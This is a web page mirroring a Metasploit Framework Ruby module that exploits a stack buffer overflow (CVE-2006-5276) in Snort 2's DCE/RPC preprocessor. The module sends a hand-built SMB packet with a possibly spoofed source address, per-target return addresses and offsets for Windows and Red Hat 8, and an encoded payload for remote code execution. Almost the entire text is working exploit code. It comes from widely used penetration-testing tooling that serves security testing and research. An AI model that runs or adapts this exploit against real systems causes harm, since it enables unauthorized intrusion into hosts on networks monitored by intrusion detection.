Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/ids/snort_dce_rpc.rb
32426 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Capture

10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',

17
        'Description' => %q{

18
          This module allows remote attackers to execute arbitrary code by exploiting the

19
          Snort service via crafted SMB traffic. The vulnerability is due to a boundary

20
          error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,

21
          which may result a stack-based buffer overflow with a specially crafted packet

22
          sent on a network that is monitored by Snort.

23


24
          Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

25


26
          Any host on the Snort network may be used as the remote host. The remote host does not

27
          need to be running the SMB service for the exploit to be successful.

28
        },

29
        'Author' => [

30
          'Neel Mehta', # Original discovery (IBM X-Force)

31
          'Trirat Puttaraksa', # POC

32
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>', # Metasploit win

33
          '0a29406d9794e4f9b30b3c5d6702c708' # Metasploit linux

34
        ],

35
        'License' => MSF_LICENSE,

36
        'References' => [

37
          [ 'OSVDB', '32094' ],

38
          [ 'CVE', '2006-5276' ],

39
          [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],

40
          [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],

41
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']

42
        ],

43
        'DefaultOptions' => {

44
          'EXITFUNC' => 'thread'

45
        },

46
        'Payload' => {

47
          'Space' => 390,

48
          'BadChars' => "\x00",

49
          'DisableNops' => true

50
        },

51
        'Targets' => [

52
          [

53
            'Windows Universal',

54
            {

55
              'Platform' => 'win',

56
              'Ret' => 0x00407c01, # JMP ESP snort.exe

57
              'Offset' => 289, # The number of bytes before overwrite

58
              'Padding' => 0

59
            }

60
          ],

61
          [

62
            'Redhat 8',

63
            {

64
              'Platform' => 'linux',

65
              'Ret' => 0xbffff110,

66
              'Offset' => 317,

67
              'Padding' => 28

68
            }

69
          ]

70
        ],

71
        'Privileged' => true,

72
        'DisclosureDate' => '2007-02-19',

73
        'DefaultTarget' => 0,

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81


82
    register_options(

83
      [

84
        Opt::RPORT(139),

85
        OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),

86
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])

87
      ]

88
    )

89


90
    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')

91
  end

92


93
  def exploit

94
    open_pcap

95


96
    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

97


98
    p = buildpacket(shost, rhost, rport.to_i)

99


100
    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")

101


102
    return unless capture_sendto(p, rhost)

103


104
    handler

105
  end

106


107
  def buildpacket(shost, rhost, rport)

108
    p = PacketFu::TCPPacket.new

109
    p.ip_saddr = shost

110
    p.ip_daddr = rhost

111
    p.tcp_dport = rport

112
    p.tcp_flags.psh = 1

113
    p.tcp_flags.ack = 1

114


115
    # SMB packet borrowed from https://www.exploit-db.com/exploits/3362

116


117
    # NetBIOS Session Service, value is the number of bytes in the TCP segment,

118
    # must be greater than the total size of the payload. Statically set.

119
    header = "\x00\x00\xde\xad"

120


121
    # SMB Header

122
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"

123
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"

124
    header << "\x00\x08\x30\x00"

125


126
    # Tree Connect AndX Request

127
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"

128
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"

129
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"

130
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

131


132
    # NT Create AndX Request

133
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"

134
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

135
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"

136
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"

137
    header << "\x63\x00\x00\x00"

138


139
    # Write AndX Request #1

140
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"

141
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"

142
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"

143
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"

144
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"

145
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"

146
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

147


148
    # Write AndX Request #2

149
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"

150
    header << "\x00\x48\x00\x00\x00\xff\x01"

151
    tail = "\x00\x00\x00\x00\x49\x00\xee"

152


153
    # Return address

154
    eip = [target['Ret']].pack('V')

155


156
    # Sploit

157
    sploit = make_nops(10)

158
    sploit << payload.encoded

159


160
    # Padding (to pass size check)

161
    sploit << make_nops(1)

162


163
    # The size to be included in Write AndX Request #2, including sploit payload

164
    requestsize = [(sploit.size + target['Offset'])].pack('v')

165


166
    # Assemble the parts into one package

167
    p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit

168


169
    p.recalc

170


171
    p

172
  end

173
end

174


175